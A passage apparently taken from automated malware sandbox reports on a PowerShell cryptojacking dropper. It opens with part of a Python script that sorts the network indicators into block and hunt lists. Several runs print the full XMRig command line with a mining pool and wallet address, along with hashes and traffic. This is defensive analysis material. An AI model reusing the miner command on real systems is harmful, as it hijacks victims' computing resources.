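        return 'unattributed'       # an endpoint with no name: attribute it before acting on it
    if domain in pool_hosts:
        return 'pool'
    if _under(domain, BACKGROUND):
        return 'background'
    if _under(domain, SHARED_HOSTING):
        return 'download-shared'
    return 'other'


def parse_network_table(text, pool_hosts=POOL_HOSTS):
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        country, dest, domain, proto = m.groups()
        ip, _, port = dest.rpartition(':')
        ipaddress.ip_address(ip)                     # raises on a malformed row
        port = int(port)
        rows.append({
            'country': country, 'ip': ip, 'port': port, 'domain': domain, 'proto': proto,
            'category': categorize(domain, pool_hosts),
            # a :53 row only tells us a name was resolved; the resolver itself is not an IOC
            'endpoint': None if port == 53 else f'{ip}:{port}',
        })
    return rows


def actionable_iocs(text, pool_hosts=POOL_HOSTS):
    """Collapse the table into a block list (pool), a hunt list (download), and a to-do list."""
    out = {'pool_domains': set(), 'pool_endpoints': set(), 'download_hosts': set(),
           'download_endpoints': set(), 'other_domains': set(), 'unattributed': set(), 'dropped': 0}
    for r in parse_network_table(text, pool_hosts):
        cat, ep = r['category'], r['endpoint']
        if cat == 'pool':
            out['pool_domains'].add(r['domain'])
            if ep:
                out['pool_endpoints'].add(ep)
        elif cat == 'download-shared':
            out['download_hosts'].add(r['domain'])
            if ep:
                out['download_endpoints'].add(ep)
        elif cat == 'unattributed':
            if ep:
                out['unattributed'].add(ep)
        elif cat == 'other':
            out['other_domains'].add(r['domain'])
        else:                                       # noise-ptr, background
            out['dropped'] += 1
    return out


if __name__ == '__main__':
    for key, value in actionable_iocs(NETWORK_TABLE).items():
        print(f'{key}: {sorted(value) if isinstance(value, set) else value}')
```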
Files
memory/4268-0-0x00007FFEE9033000-0x00007FFEE9035000-memory.dmp
memory/4268-6-0x0000020B43EE0000-0x0000020B43F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_swd2gf1t.dv0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4268-11-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-12-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-13-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-14-0x00007FFEE9033000-0x00007FFEE9035000-memory.dmp
memory/4268-16-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-17-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/4268-18-0x0000020B44150000-0x0000020B44162000-memory.dmp
memory/4268-19-0x0000020B43EB0000-0x0000020B43EBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/8-50-0x0000027CCCB50000-0x0000027CCCB70000-memory.dmp
memory/8-51-0x0000027CCCBA0000-0x0000027CCCBC0000-memory.dmp
memory/8-52-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-53-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-54-0x0000027CCCBE0000-0x0000027CCCC00000-memory.dmp
memory/8-55-0x0000027CCCBC0000-0x0000027CCCBE0000-memory.dmp
memory/8-56-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/4268-57-0x00007FFEE9030000-0x00007FFEE9AF1000-memory.dmp
memory/8-58-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-59-0x0000027CCCBE0000-0x0000027CCCC00000-memory.dmp
memory/8-60-0x0000027CCCBC0000-0x0000027CCCBE0000-memory.dmp
memory/8-61-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-62-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-63-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-64-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-65-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-66-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-67-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-68-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-69-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-70-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-71-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-72-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-73-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-74-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-75-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-76-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-77-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-78-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-79-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-80-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-81-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-82-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
memory/8-83-0x00007FF66F060000-0x00007FF66FC93000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
293s
Max time network
280s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 29 matches; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3828 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3828 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.43:443 | N/A | tcp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3828-0-0x00007FF9F4E93000-0x00007FF9F4E95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2ywkijb.gyy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
293s
Max time network
297s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3348 wrote to memory of 3488 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3348 wrote to memory of 3488 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lwtzqefa.ygd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win7-20240220-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
295s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4400 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4400 wrote to memory of 1964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4iavthr.bgm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
296s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3456 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3456 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cmanr0u.3zv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
290s
Max time network
296s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2316 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4ysklin.wqs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
291s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
